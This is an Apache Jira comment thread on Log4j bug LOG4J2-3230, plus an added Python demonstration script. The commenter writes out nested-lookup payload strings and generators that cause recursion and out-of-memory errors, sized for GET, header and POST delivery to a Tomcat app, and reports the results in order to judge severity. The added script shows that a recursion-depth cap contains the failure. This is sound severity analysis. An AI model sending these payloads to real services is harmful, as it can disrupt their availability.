[
https://issues.apache.org/jira/browse/LOG4J2-3230?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17461971#comment-17461971
]
AP commented on LOG4J2-3230:
----------------------------
I concur with [~harmeetbedi] and [~mfriedenhagen].
I don't see any "high" real-world implication of this DoS (Denial of Service)
either. Yes, it can lead to exceptions, could be used to perform log evasion,
or even cause very minor lags, but they are not substantial enough to kill/exit
the execution of the app completely, and the attack complexity of successful
exploitation is high.
For an example, let's assume we are using an application utilizing Log4j 2.14
(for the sake of simplicity of exploit delivery) on a Tomcat server:
The exploit in this thread
{code}
${${::-${::-$${::-j}}}}
{code}
will trigger an IllegalStateException with no lags/delays.
I was able to come up with a new payload that triggers a StackOverflow exception,
but it doesn't crash the app, kill it, or disrupt it to the extent that it quits.
Put this in a Python interpreter to get the payload and see it work:
{code:python}
"${" + "${::-"*1200 + "$${::-j}" + "}"*1200 + "}"
{code}
I tested three real-world scenarios:
*1.) Payload delivered via GET (it usually has a size restriction of 2048 bytes):*
{code:python}
"${" + "${::-"*300 + "$${::-j}" + "}"*300 + "}"
{code}
Outcome: no lag, no exception, app continues normally.
*2.) Payload delivered via header (Tomcat max size 8k - 48k):*
{code:python}
"${" + "${::-"*8000 + "$${::-j}" + "}"*8000 + "}"
{code}
Outcome: 1 second lag, StackOverflow exception, app continues normally.
*3.) Payload delivered via POST (Tomcat default 2MB):*
{code:python}
"${" + "${::-"*500000 + "$${::-j}" + "}"*500000 + "}"
{code}
Outcome: 18 second lag, java.lang.OutOfMemoryError, app continues normally.
Tested on OS X with 16 GB RAM; we are not even considering a high-end server in
this case. Also, these tests assume 2.14, where payloads are delivered easily,
but from 2.15 onwards there are a lot more "ifs" for an exploitation to be
successful (context, %m{lookups}, etc.). So the attack complexity (AC) for a
successful and disruptive crash tends to be high.
I would, however, be interested to see if any real-world apps get fully
crashed/exited/killed due to this DoS on default Log4j 2.14 onwards usage.
> Certain strings can cause infinite recursion
> --------------------------------------------
>
> Key: LOG4J2-3230
> URL: https://issues.apache.org/jira/browse/LOG4J2-3230
> Project: Log4j 2
> Issue Type: Bug
> Components: Core
> Affects Versions: 2.8, 2.8.1, 2.8.2, 2.9.0, 2.9.1, 2.10.0, 2.11.0, 2.11.1,
> 2.11.2, 2.12.0, 2.12.1, 2.13.0, 2.13.1, 2.13.2, 2.14.0, 2.13.3, 2.14.1,
> 2.15.0, 2.16.0
> Reporter: Ross Cohen
> Assignee: Carter Kozak
> Priority: Major
> Fix For: 2.17.0
>
> Attachments: sample.tar.gz
>
>
> If a string substitution is attempted for any reason on the following string,
> it will trigger an infinite recursion, and the application will crash:
> ${${::-${::-$${::-j}}}}.
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
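The script below is an added example; it is not code from the Jira thread, from AP's tests, or from Log4j itself. It builds the nested-lookup payloads with the same one-liner construction the comment uses, works out the largest nesting depth that fits in each delivery channel the comment tested (the byte budgets, including taking the upper end of the "8k - 48k" header range, are assumptions for the illustration), and then runs a toy inside-out `${...}` resolver with and without a recursion cap. The resolver's semantics (known key, `:-` default, `$${...}` escape, re-resolving every result) are a simplification modelled on the payload's syntax, not Log4j's StrSubstitutor, and the fixed Python recursion limit stands in for the JVM thread stack; the point it demonstrates is the one the comment makes, that nesting depth (bounded by the channel's size limit) rather than raw length is what exhausts the stack, and that a depth cap turns the overflow into a controlled exception.

```python
"""Added example (not from the Jira thread or Log4j): build the nested-lookup
payloads the comment describes, see which delivery channel can carry a given
depth, and run a toy ${...} resolver with and without a recursion cap."""
import sys

def build_payload(depth: int) -> str:
    """Same construction as the comment's Python one-liner; length is 11 + 6*depth."""
    return "${" + "${::-" * depth + "$${::-j}" + "}" * depth + "}"

# Byte budgets quoted in the comment. Assumptions for this illustration; real
# limits depend on the Tomcat version and configuration.
CHANNEL_LIMITS = {
    "GET query string": 2048,
    "request header": 48 * 1024,      # upper end of the quoted "8k - 48k"
    "POST body": 2 * 1024 * 1024,
}

def max_depth_per_channel(limits=CHANNEL_LIMITS) -> dict:
    """Largest nesting depth whose payload still fits in each channel."""
    return {name: (limit - 11) // 6 for name, limit in limits.items()}

class RecursionCapExceeded(Exception):
    """Raised instead of exhausting the stack when a depth cap is set."""

def _matching_brace(text: str, open_idx: int) -> int:
    """Index of the '}' that closes the '{' at open_idx."""
    level = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            level += 1
        elif text[i] == "}":
            level -= 1
            if level == 0:
                return i
    raise ValueError("unbalanced braces")

def resolve(text: str, variables: dict, depth: int = 0, max_depth=None) -> str:
    """Toy inside-out resolver for ${[prefix:]key:-default}; NOT Log4j's
    StrSubstitutor. Known key -> variables[key]; else the default; a key with
    no default stays as ${key}. $${...} escapes to the literal ${...}. Every
    resolved value is resolved again, so nesting and self-reference both
    become recursion depth."""
    if max_depth is not None and depth > max_depth:
        raise RecursionCapExceeded(f"nesting deeper than {max_depth}")
    out, i = [], 0
    while i < len(text):
        if text.startswith("$${", i):                # escape: copy literally
            j = _matching_brace(text, i + 2)
            out.append(text[i + 1:j + 1])
            i = j + 1
        elif text.startswith("${", i):
            j = _matching_brace(text, i + 1)
            inner = resolve(text[i + 2:j], variables, depth + 1, max_depth)
            key, sep, default = inner.partition(":-")
            key = key.rpartition(":")[2]             # drop any "prefix:"
            if key in variables:
                value = variables[key]
            elif sep:
                value = default
            else:
                out.append("${" + key + "}")         # unresolved: leave as-is
                i = j + 1
                continue
            out.append(resolve(value, variables, depth + 1, max_depth))
            i = j + 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)

def outcome(payload: str, variables=None, max_depth=None, frame_limit=1000) -> str:
    """Resolve under a fixed interpreter recursion limit (standing in for the
    JVM thread stack the comment's tests exhaust) and report what happened."""
    old = sys.getrecursionlimit()
    sys.setrecursionlimit(frame_limit)
    try:
        resolve(payload, variables or {}, max_depth=max_depth)
        return "resolved"
    except RecursionError:
        return "RecursionError (stack exhausted)"
    except RecursionCapExceeded:
        return "RecursionCapExceeded (controlled)"
    finally:
        sys.setrecursionlimit(old)

if __name__ == "__main__":
    for name, depth in max_depth_per_channel().items():
        print(f"{name:<17} carries nesting depth <= {depth}")
    for depth in (300, 1200):                        # the comment's GET and StackOverflow depths
        print(f"depth {depth:>4}: uncapped -> {outcome(build_payload(depth))};"
              f" cap 500 -> {outcome(build_payload(depth), max_depth=500)}")
    loop = {"loop": "${loop}"}                       # constructed self-reference
    print("self-reference: uncapped ->", outcome("${loop}", loop),
          "; cap 500 ->", outcome("${loop}", loop, max_depth=500))
```

Run it directly to see the per-channel depth budget (for example, a 2048-byte GET query string carries at most 339 levels of nesting, which is why the comment's 300-level GET payload resolved quietly), the depth-300 payload resolving while the depth-1200 payload exhausts the stack, and the same depth-1200 payload failing with a controlled RecursionCapExceeded once a cap is set. The self-referencing value at the end is the generic shape of "a string that causes infinite recursion": no amount of input-size limiting stops it, only a depth cap does.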